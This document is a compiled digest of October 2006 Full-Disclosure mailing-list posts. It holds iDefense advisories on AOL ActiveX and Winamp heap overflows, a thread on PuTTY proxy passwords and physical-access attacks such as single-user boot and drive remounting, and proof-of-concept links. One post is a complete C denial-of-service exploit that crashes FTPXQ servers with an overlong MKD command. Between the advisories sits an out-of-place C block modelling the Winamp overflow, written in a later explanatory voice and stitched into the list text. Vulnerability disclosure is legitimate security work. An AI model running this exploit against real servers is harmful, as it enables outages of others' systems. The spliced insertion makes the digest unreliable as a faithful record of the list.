Re: [Full-disclosure] Putty Proxy login/password disclosure....
If you have access to a local account, yes, but if you do not have any account, it's harder than "linux single" was.

On Thu, 26 Oct 2006 00:12:36 +0200 endrazine <[EMAIL PROTECTED]> wrote:

e> cardoso wrote:
e> > Exactly. A few years ago I used to deal with linux fanboys showing them
e> > the cute trick of "linux single" at boot time. After a few hours begging
e> > for the admin password, I taught the trick and they usually stopped
e> > bragging about how secure Linux was.
e> >
e> You know we do appreciate your work with crackheads.
e> Local attacks against windows are easier imho though.
e>
e> endrazine-

-
Carlos Cardoso
http://www.carloscardoso.com <== semi-personal blog
http://www.contraditorium.com <== ProBlogging and digital culture

"You lost today, kid. But that doesn't mean you have to like it"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IE7 status: 8 days after release, 3 unfixed issues
It's difficult to believe, well, no, actually it's not.

CVE-2005-3312, which is based on information released as early as September 2005, is still unfixed in Internet Explorer 7 (and any IE6).

POC: http://moritz-naumann.com/tests/xss2.jpg

Whoever doesn't consider this a vulnerability, please direct your comments to a null device of your choice.

Combined with http://secunia.com/product/12366/?task=advisories this makes 3 unfixed issues in IE7 within less than ten days. Maybe some of the 19 unpatched issues listed for IE6 on http://secunia.com/product/11/?task=advisories apply to IE7, too? No, this is not meant to be a Secunia promo.

Who has more unfixed IE7 (stable) issues to add to the list?

Moritz
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Paul Schmehl wrote:
> Not even that is true. You can always *access* the data. Depending
> upon the type and complexity of the encryption, it may take a while to
> decrypt, but once I have physical access, I have both the data and the
> time to do just that. *Most* of the "encryption" schemes for things
> like passwords that

several times the age of the universe is a while though.

> used to be stored in plain text (until somebody pointed it out) are
> fairly trivial and easily broken.
>
> Even if they're not, I may be able to use the program itself to
> decrypt the password and then capture it in plain text in memory.

you know you can use pretty strong encryption on HD, right?

> Again, once you have physical access, it's game over, plain and simple.
>
> Paul Schmehl ([EMAIL PROTECTED])

Regards,
endrazine-
Re: [Full-disclosure] Putty Proxy login/password disclosure....
cardoso wrote:
> Exactly. A few years ago I used to deal with linux fanboys showing them
> the cute trick of "linux single" at boot time. After a few hours begging
> for the admin password, I taught the trick and they usually stopped
> bragging about how secure Linux was.
>
You know we do appreciate your work with crackheads.
Local attacks against windows are easier imho though.

endrazine-
Re: [Full-disclosure] Flaw in Firefox 2.0 RC2
On 10/20/06, Jure Pečar <[EMAIL PROTECTED]> wrote:
> On Thu, 19 Oct 2006 13:05:48 -0400
> Mark A Basil <[EMAIL PROTECTED]> wrote:
> > On Wed, 2006-10-18 at 10:28 +1000, jm wrote:
> > > Firefox 1.5.07 on CentOS died quite nicely too.
> > > [EMAIL PROTECTED] wrote:
> > > > http://lcamtuf.coredump.cx/ffoxdie.html
> > > > this exploit still works with the latest Firefox 2.0 RC3
> > It is also affecting any browser using the Gecko rendering engine
> > (gecko-1.8 at least), such as Epiphany and Galeon, and not restricted to
> > 'Firefox'.
> Also renders Opera 9.02 (build 434) on linux unresponsive at 100% cpu usage.

Netcat 0.7.1 isn't affected on FreeBSD 7.0.

--
Tyop?
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL YGPPDownload AddPictureNoAlbum ActiveX Control Heap Corruption Vulnerability
AOL YGPPDownload AddPictureNoAlbum ActiveX Control Heap Corruption Vulnerability

iDefense Security Advisory 10.25.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 25, 2006

I. BACKGROUND

America Online 9.0 Security Edition builds upon Internet Explorer technology to offer its users enhanced security and usability features. More information can be found on the vendor's site at the following URL:

http://www.corp.aol.com/products/brands_aol2.shtml

II. DESCRIPTION

America Online 9.0 Security Edition ships with an ActiveX control which is marked as safe for scripting and contains a buffer overflow vulnerability which allows for the arbitrary execution of code.

When AOL 9.0 is installed, it registers the following ActiveX control on the system:

ProgId: AOL.PicDownloadCtrl.1
ClassId: D670D0B3-05AB-4115-9F87-D983EF1AC747
File: YGPPicDownload.dll

This control is registered as safe for scripting in IE and contains a buffer overflow in its AddPictureNoAlbum() method.

III. ANALYSIS

Exploitation of this vulnerability is trivial and allows for arbitrary execution of code as the currently logged in user. Users would need to be convinced to go to a malicious web site in order to be exploited.

IV. DETECTION

This vulnerability has been verified in AOL Security Edition 9.0 with downloader plugin version 9.2.3.0.

V. WORKAROUND

Disabling Active Scripting or unregistering the vulnerable control can prevent exploitation.

VI. VENDOR RESPONSE

"All AOL software versions are affected by this issue.

Solutions

1. Users of AOL 9.0 or AOL 9.0 Security Edition are recommended to log in to the AOL service and a fix will be seamlessly applied to their system.

2. Users using versions of AOL that are older than 9.0 are strongly recommended to upgrade to the latest version of AOL 9.0 Security Edition."

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/12/2006  Initial vendor notification
10/23/2006  Initial vendor response
10/25/2006  Coordinated public disclosure

IX. CREDIT

The vulnerability was discovered by Dennis Rand - CIRT.DK

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL YGPPDownload downloadFileDirectory ActiveX Control Heap Corruption Vulnerability
AOL YGPPDownload downloadFileDirectory ActiveX Control Heap Corruption Vulnerability

iDefense Security Advisory 10.25.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 25, 2006

I. BACKGROUND

America Online 9.0 Security Edition builds upon Internet Explorer technology to offer its users enhanced security and usability features. More information can be found on the vendor's site at the following URL:

http://www.corp.aol.com/products/brands_aol2.shtml

II. DESCRIPTION

America Online 9.0 Security Edition ships with an ActiveX control which is marked as safe for scripting and contains a buffer overflow vulnerability which allows for the arbitrary execution of code.

When AOL 9.0 is installed, it registers the following ActiveX control on the system:

ProgId: AOL.PicDownloadCtrl.1
ClassId: D670D0B3-05AB-4115-9F87-D983EF1AC747
File: YGPPicDownload.dll

This control is registered as safe for scripting in IE and contains a buffer overflow in its downloadFileDirectory property.

III. ANALYSIS

Exploitation of this vulnerability allows for arbitrary execution of code as the currently logged in user. Users would need to be convinced to go to a malicious web site in order to be exploited.

IV. DETECTION

This vulnerability has been verified in AOL Security Edition 9.0 with downloader plugin version 9.2.3.0.

V. WORKAROUND

Disabling Active Scripting or unregistering the vulnerable control can prevent exploitation.

VI. VENDOR RESPONSE

"All AOL software versions are affected by this issue.

Solutions

1. Users of AOL 9.0 or AOL 9.0 Security Edition are recommended to log in to the AOL service and a fix will be seamlessly applied to their system.

2. Users using versions of AOL that are older than 9.0 are strongly recommended to upgrade to the latest version of AOL 9.0 Security Edition."

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/12/2006  Initial vendor notification
10/23/2006  Initial vendor response
10/25/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL Nullsoft Winamp Ultravox 'ultravox-max-msg' Header Heap Overflow Vulnerability
AOL Nullsoft Winamp Ultravox 'ultravox-max-msg' Header Heap Overflow Vulnerability

iDefense Security Advisory 10.25.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 25, 2006

I. BACKGROUND

Ultravox is a streaming media technology developed by AOL for delivering and publishing streaming media such as music files. The Winamp media player has support for this protocol. More information about Winamp is available at the following site:

http://www.winamp.com

II. DESCRIPTION

Remote exploitation of a heap-based buffer overflow vulnerability in the Ultravox protocol handler of AOL Corp.'s Nullsoft Winamp media player could allow an attacker to execute arbitrary code in the context of the currently logged in user.

Due to an error in the handling of the 'ultravox-max-msg' header, it is possible for a malicious server to cause the Winamp client to allocate a very small amount of space and then try to fill it with a large amount of server-supplied data, potentially overwriting values which will lead to code execution.

III. ANALYSIS

Successful exploitation of this vulnerability would allow a remote attacker to execute code in the context of the user who started Winamp. In order to exploit this vulnerability, the attacker would need to cause or convince the intended victim to connect to a malicious server. This could be accomplished by embedding a link in a web page to a playlist file, a 'shout:' URI or a 'uvox:' URI, which are automatically loaded by Winamp from Internet Explorer. Alternatively, one of these items could be placed in a playlist file. The attacker would have no way to force the user to open the content they have supplied.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in versions 5.24 and 5.3 of Nullsoft Winamp. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workarounds for this vulnerability.

VI. VENDOR RESPONSE

Nullsoft has released version 5.31 of Winamp to address this problem.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/19/2006  Initial vendor notification
10/25/2006  Initial vendor response
10/25/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[Full-disclosure] iDefense Security Advisory 10.25.06: AOL Nullsoft Winamp Ultravox Lyrics3 v2.00 tags Heap Overflow Vulnerability
AOL Nullsoft Winamp Ultravox Lyrics3 v2.00 tags Heap Overflow Vulnerability

iDefense Security Advisory 10.25.06
http://www.idefense.com/intelligence/vulnerabilities/
Oct 25, 2006

I. BACKGROUND

Lyrics3 is a system for embedding the lyrics inside an MP3 song file. The Winamp media player has support for this protocol. More information about Winamp is available at the following site:

http://www.winamp.com

II. DESCRIPTION

Remote exploitation of a heap-based buffer overflow vulnerability in the Ultravox Lyrics3 parsing code in AOL Corp.'s Nullsoft Winamp media player could allow an attacker to execute arbitrary code in the context of the currently logged in user.

Due to an error in the parsing of certain Lyrics3 tags, a malicious server can cause the Winamp client to allocate a very small amount of space and then try to fill it with a large amount of server-supplied data, potentially overwriting values which will lead to code execution.

III. ANALYSIS

Exploitation allows remote attackers to execute code in the context of the user who started Winamp. Exploitation requires that attackers social engineer victims into connecting to a server. This can be accomplished by embedding a link in a web page to a playlist file, a 'shout:' URI or a 'uvox:' URI, which are automatically loaded by Winamp from Internet Explorer. Alternatively, one of these items could be placed in a playlist file. However, attackers cannot force users to open the content they have supplied.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in versions 5.24 and 5.3 of Nullsoft Winamp. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workarounds for this vulnerability.

VI. VENDOR RESPONSE

Nullsoft has released version 5.31 of Winamp to address this problem.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/19/2006  Initial vendor notification
10/25/2006  Initial vendor response
10/25/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
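Both Winamp advisories above describe the same defect: the client sizes a heap buffer from a value the server declares, then copies server-supplied data into it without checking that copy against the allocation. The following is an added illustration of that pattern and its fix, not iDefense's or Nullsoft's code; the "ultravox-max-msg: N" header line, the one-frame exchange and the MAX_MSG_CEILING sanity limit are constructed for this example and are not the real Ultravox wire protocol.

```c
/* Constructed model of "buffer sized from a peer-declared header, filled
 * with a peer-supplied frame". Wire format and limits are made up here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>

#define MAX_MSG_HEADER  "ultravox-max-msg:"
#define MAX_MSG_CEILING (1024u * 1024u)  /* example sanity cap, 1 MiB */

typedef struct {
    uint8_t *data;  /* receive buffer, sized from the header */
    size_t   cap;   /* bytes allocated */
    size_t   len;   /* bytes currently stored */
} msgbuf_t;

/* Parse "ultravox-max-msg: N". Returns N, or 0 when the header is missing,
 * non-numeric, zero, or above the ceiling, so a hostile server cannot pick
 * an arbitrary allocation size. */
size_t parse_max_msg(const char *line)
{
    size_t hlen = strlen(MAX_MSG_HEADER);
    if (strncmp(line, MAX_MSG_HEADER, hlen) != 0)
        return 0;
    const char *p = line + hlen;
    while (*p == ' ')
        p++;
    char *end;
    errno = 0;
    unsigned long v = strtoul(p, &end, 10);
    if (errno != 0 || end == p)
        return 0;
    if (*end != '\0' && *end != '\r' && *end != '\n')
        return 0;
    if (v == 0 || v > MAX_MSG_CEILING)
        return 0;
    return (size_t)v;
}

int msgbuf_init(msgbuf_t *m, size_t cap)
{
    m->data = malloc(cap);
    m->cap = cap;
    m->len = 0;
    return m->data ? 0 : -1;
}

void msgbuf_free(msgbuf_t *m)
{
    free(m->data);
    m->data = NULL;
    m->cap = m->len = 0;
}

/* The unsafe condition, stated as a predicate rather than performed:
 * copying frame_len bytes into cap bytes writes past the allocation
 * whenever frame_len > cap. That is the heap corruption the advisories
 * describe. */
int would_overflow(size_t cap, size_t frame_len)
{
    return frame_len > cap;
}

/* Hardened receive: validate the frame against the allocation before any
 * byte is copied. Returns 0 on success, -1 when the frame is rejected. */
int msgbuf_store_frame(msgbuf_t *m, const uint8_t *frame, size_t frame_len)
{
    if (m->data == NULL || would_overflow(m->cap, frame_len))
        return -1;
    memcpy(m->data, frame, frame_len);
    m->len = frame_len;
    return 0;
}

/* Drive one constructed server response: a header line, then one frame.
 * Returns 1 if the frame was accepted, 0 if it was rejected because it
 * would have overflowed the header-sized buffer, -1 if the header itself
 * was rejected. */
int handle_server(const char *header_line, const uint8_t *frame, size_t frame_len)
{
    size_t cap = parse_max_msg(header_line);
    if (cap == 0)
        return -1;
    msgbuf_t m;
    if (msgbuf_init(&m, cap) != 0)
        return -1;
    int rc = (msgbuf_store_frame(&m, frame, frame_len) == 0) ? 1 : 0;
    msgbuf_free(&m);
    return rc;
}

int main(void)
{
    /* Constructed samples: a hostile server declares a tiny max-msg and
     * then sends a frame four times larger; a benign one stays within it. */
    uint8_t big[64], small[8];
    memset(big, 'A', sizeof big);
    memset(small, 'B', sizeof small);
    printf("hostile frame: %d\n", handle_server("ultravox-max-msg: 16", big, sizeof big));
    printf("benign frame:  %d\n", handle_server("ultravox-max-msg: 16", small, sizeof small));
    printf("bad header:    %d\n", handle_server("ultravox-max-msg: 0", small, sizeof small));
    return 0;
}
```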
Re: [Full-disclosure] RE : Putty Proxy login/password disclosure....(Answer from PUTTY Staff)
Matthew Flaschen <[EMAIL PROTECTED]> wrote:
> Could use the same passphrase for the proxy password and SSH keys?

Only works if you _are_ entering a passphrase for the SSH key; if you're using password authentication, a passphraseless key, the SSH agent, or connecting to a server which doesn't ask for SSH-level authentication at all, you're back to square one. This isn't a general solution.

Cheers,
Simon

--
for k in [pow(x,37,0x13AC59F3ECAC3127065A9) for x in [0x195A0BCE1C2F0310B43C,
0x73A0CE584254AB23D5A0, 0x12878657EA814421CC92, 0x7373445BB3DA69996F4A,
0x77A7ED5BC3AA700E80B2, 0xE9C71C94ED87ADCF7367, 0xFE920395F414C1A5DB50]]:
    print "".join([chr(32+3*((k>>x)&1))for x in range(79)]) # <[EMAIL PROTECTED]>
[Full-disclosure] FTPXQ Denial of service exploit.
/*
 * 0xf_ftpxq.c - FTPXQ Denial of service exploit.
 * Federico Fazzi <[EMAIL PROTECTED]>
 *
 * advisory by Eric Sesterhenn.
 * -- Server built using the WinsockQ from DataWizard Technologies. A security
 * -- vulnerability in the product allows remote attackers to overflow an
 * -- internal buffer by providing an overly long "make directory" request.
 *
 * r20061025.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

// "A" * 255 in hex format.
char bof[] =
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41";

int main(int argc, char **argv)
{
    int sd;
    socklen_t len;
    struct sockaddr_in saddr;
    struct hostent *he;
    char buf[512], tmpbuf[128];

    if (argc != 5) {
        printf("FTPXQ Server - Denial of service exploit.\n"
               "Federico Fazzi <[EMAIL PROTECTED]>\n\n"
               "usage: %s <host> <port> <user> <pass>\n", argv[0]);
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname()");
        exit(1);
    }

    // init socket
    if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
        exit(1);
    }

    // setup struct
    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    memcpy(&saddr.sin_addr.s_addr, he->h_addr_list[0], he->h_length);
    saddr.sin_port = htons(atoi(argv[2]));
    len = sizeof(struct sockaddr);

    // init connection
    if (connect(sd, (struct sockaddr *)&saddr, len) == -1) {
        perror("connect()");
        exit(1);
    }

    printf("FTPXQ Server - Denial of service exploit.\n"
           "Federico Fazzi <[EMAIL PROTECTED]>\n"
           "---\n");
    puts("connecting..\t\t done");

    // sending USER data to the daemon
    snprintf(buf, sizeof(buf), "USER %s\r\n", argv[3]);
    write(sd, buf, strlen(buf));
    puts("sending USER data..\t done");

    // sending PASS data to the daemon
    snprintf(buf, sizeof(buf), "PASS %s\r\n", argv[4]);
    write(sd, buf, strlen(buf));
    puts("sending PASS data..\t done");

    // sending the overly long MKD command to the host
    snprintf(buf, sizeof(buf), "MKD %s\r\n", bof);
    write(sd, buf, strlen(buf));
    puts("sending MKD bof string.. done");

    // now checking if the server is down
    if (read(sd, tmpbuf, sizeof(tmpbuf)) > 0)
        puts("[!] server doesn't seem vulnerable");
    else
        puts("[+] server getting down.. done");

    close(sd);
    return 0;
}
Re: [Full-disclosure] RE : Putty Proxy login/password disclosure....(Answer from PUTTY Staff)
Matthew Flaschen <[EMAIL PROTECTED]> wrote:
> Why can't you generate the encryption key from a passphrase?

Because requiring the user to type in their passphrase at the start of the session in order to decrypt their proxy password is no more convenient than requiring them to type in the proxy password directly!

--
Simon Tatham           "What a caterpillar calls the end of the
<[EMAIL PROTECTED]>     world, a human calls a butterfly."
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Sadly, not even that will help you anymore ...

http://www.hackaday.com/2005/08/24/lock-bumping-revisited/

--=Q=--

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Matthew Flaschen
Sent: Wednesday, October 25, 2006 3:20 PM
To: cardoso
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Putty Proxy login/password disclosure

I have a dual WinXP/Debian boot, and I deal with that problem by locking my door.

Matt Flaschen

cardoso wrote:
> Exactly. A few years ago I used to deal with linux fanboys showing them
> the cute trick of "linux single" at boot time. After a few hours begging
> for the admin password, I taught the trick and they usually stopped
> bragging about how secure Linux was.
>
>
> On Wed, 25 Oct 2006 12:34:49 -0500
> Paul Schmehl <[EMAIL PROTECTED]> wrote:
>
> PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED]
> PS> wrote:
> PS>
> PS> > Windows offers no security against local users. It is trivial to boot to
> PS> > a program like ERD Commander and replace admin passwords. On the other
> PS> > hand, PuTTy is meant to protect against everyone; that's why it doesn't
> PS> > allow saved passwords. Thus, this seems like a vulnerability to me.
> PS> >
> PS> Unix offers no security against local users either. If I can sit at the
> PS> console, I can login in single user mode, mount the drives rw and edit
> PS> /etc/passwd all day.
> PS>
> PS> Furthermore, I can take any hard drive, with any file system on it, and
> PS> with the right tools I can read everything on the drive, even deleted stuff.
> PS>
> PS> So what's your point? That when you own the box you own the box?
> PS>
> PS> If you first have to own the box to get to the information, then it's not a
> PS> vulnerability. It's not best practice, but it's not a vulnerability.
> PS>
> PS> Paul Schmehl ([EMAIL PROTECTED])
> PS> Senior Information Security Analyst
> PS> The University of Texas at Dallas
> PS> http://www.utdallas.edu/ir/security/
>
> -
> Carlos Cardoso
> http://www.carloscardoso.com <== semi-personal blog
> http://www.contraditorium.com <== ProBlogging and digital culture
>
> "You lost today, kid. But that doesn't mean you have to like it"
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Sounds cool. Battering ram is easier, though. I said, deal with, not solve.

Matthew Flaschen

North, Quinn wrote:
> Sadly, not even that will help you anymore ...
>
> http://www.hackaday.com/2005/08/24/lock-bumping-revisited/
>
> --=Q=--
>
> -----Original Message-----
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED]] On Behalf Of Matthew Flaschen
> Sent: Wednesday, October 25, 2006 3:20 PM
> To: cardoso
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Putty Proxy login/password disclosure
>
> I have a dual WinXP/Debian boot, and I deal with that problem by locking
> my door.
>
> Matt Flaschen
>
> cardoso wrote:
>> Exactly. A few years ago I used to deal with linux fanboys showing them
>> the cute trick of "linux single" at boot time. After a few hours begging
>> for the admin password, I taught the trick and they usually stopped
>> bragging about how secure Linux was.
>>
>>
>> On Wed, 25 Oct 2006 12:34:49 -0500
>> Paul Schmehl <[EMAIL PROTECTED]> wrote:
>>
>> PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED]
>> PS> wrote:
>> PS>
>> PS> > Windows offers no security against local users. It is trivial to boot to
>> PS> > a program like ERD Commander and replace admin passwords. On the other
>> PS> > hand, PuTTy is meant to protect against everyone; that's why it doesn't
>> PS> > allow saved passwords. Thus, this seems like a vulnerability to me.
>> PS> >
>> PS> Unix offers no security against local users either. If I can sit at the
>> PS> console, I can login in single user mode, mount the drives rw and edit
>> PS> /etc/passwd all day.
>> PS>
>> PS> Furthermore, I can take any hard drive, with any file system on it, and
>> PS> with the right tools I can read everything on the drive, even deleted stuff.
>> PS>
>> PS> So what's your point? That when you own the box you own the box?
>> PS>
>> PS> If you first have to own the box to get to the information, then it's not a
>> PS> vulnerability. It's not best practice, but it's not a vulnerability.
>> PS>
>> PS> Paul Schmehl ([EMAIL PROTECTED])
>> PS> Senior Information Security Analyst
>> PS> The University of Texas at Dallas
>> PS> http://www.utdallas.edu/ir/security/
>>
>> -
>> Carlos Cardoso
>> http://www.carloscardoso.com <== semi-personal blog
>> http://www.contraditorium.com <== ProBlogging and digital culture
>>
>> "You lost today, kid. But that doesn't mean you have to like it"
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Obviously, with physical access and unlimited computing power there's no security. Too bad no one has unlimited computing power (and very few have the power to break readily available schemes).

Matthew Flaschen

Paul Schmehl wrote:
> --On Wednesday, October 25, 2006 15:18:10 -0400 Matthew Flaschen
> <[EMAIL PROTECTED]> wrote:
>
>> Sorry, I shouldn't have implied that was only true of Windows. However,
>> you CAN'T access encrypted data with physical drive access.
>>
> Not even that is true. You can always *access* the data. Depending
> upon the type and complexity of the encryption, it may take a while to
> decrypt, but once I have physical access, I have both the data and the
> time to do just that. *Most* of the "encryption" schemes for things
> like passwords that used to be stored in plain text (until somebody
> pointed it out) are fairly trivial and easily broken.
>
> Even if they're not, I may be able to use the program itself to decrypt
> the password and then capture it in plain text in memory.
>
> Again, once you have physical access, it's game over, plain and simple.
>
> Paul Schmehl ([EMAIL PROTECTED])
> Senior Information Security Analyst
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Putty Proxy login/password disclosure....
--On Wednesday, October 25, 2006 15:18:10 -0400 Matthew Flaschen <[EMAIL PROTECTED]> wrote:

> Sorry, I shouldn't have implied that was only true of Windows. However,
> you CAN'T access encrypted data with physical drive access.

Not even that is true. You can always *access* the data. Depending upon the type and complexity of the encryption, it may take a while to decrypt, but once I have physical access, I have both the data and the time to do just that. *Most* of the "encryption" schemes for things like passwords that used to be stored in plain text (until somebody pointed it out) are fairly trivial and easily broken.

Even if they're not, I may be able to use the program itself to decrypt the password and then capture it in plain text in memory.

Again, once you have physical access, it's game over, plain and simple.

Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Putty Proxy login/password disclosure....
I have a dual WinXP/Debian boot, and I deal with that problem by locking my door.

Matt Flaschen

cardoso wrote:
> Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I taught them the trick and they usually stopped bragging about how secure Linux was.
>
> On Wed, 25 Oct 2006 12:34:49 -0500
> Paul Schmehl <[EMAIL PROTECTED]> wrote:
>
> PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] wrote:
> PS>
> PS> > Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.
> PS> >
> PS> Unix offers no security against local users either. If I can sit at the console, I can log in in single-user mode, mount the drives rw and edit /etc/passwd all day.
> PS>
> PS> Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff.
> PS>
> PS> So what's your point? That when you own the box you own the box?
> PS>
> PS> If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability.
> PS>
> PS> Paul Schmehl ([EMAIL PROTECTED])
> PS> Senior Information Security Analyst
> PS> The University of Texas at Dallas
> PS> http://www.utdallas.edu/ir/security/
>
> -
> Carlos Cardoso
> http://www.carloscardoso.com <== semi-personal blog
> http://www.contraditorium.com <== ProBlogging and digital culture
>
> "You lost today, kid. But that doesn't mean you have to like it"
Re: [Full-disclosure] Putty Proxy login/password disclosure....
--On Wednesday, October 25, 2006 23:57:15 +0530 Raj Mathur <[EMAIL PROTECTED]> wrote:

> On Wednesday 25 October 2006 23:14, cardoso wrote:
>> Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I taught them the trick and they usually stopped bragging about how secure Linux was.
>
> Can't do that in most modern distributions today -- they're configured to ask for root password before they give a single-user shell.
>
> Not that there aren't other ways around that restriction...

Precisely - like booting from a Knoppix cd, mounting the drives rw... you get the picture. Physical access == total access. Worst case scenario, I simply remove the drives and mount them on a box that I do control.

Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
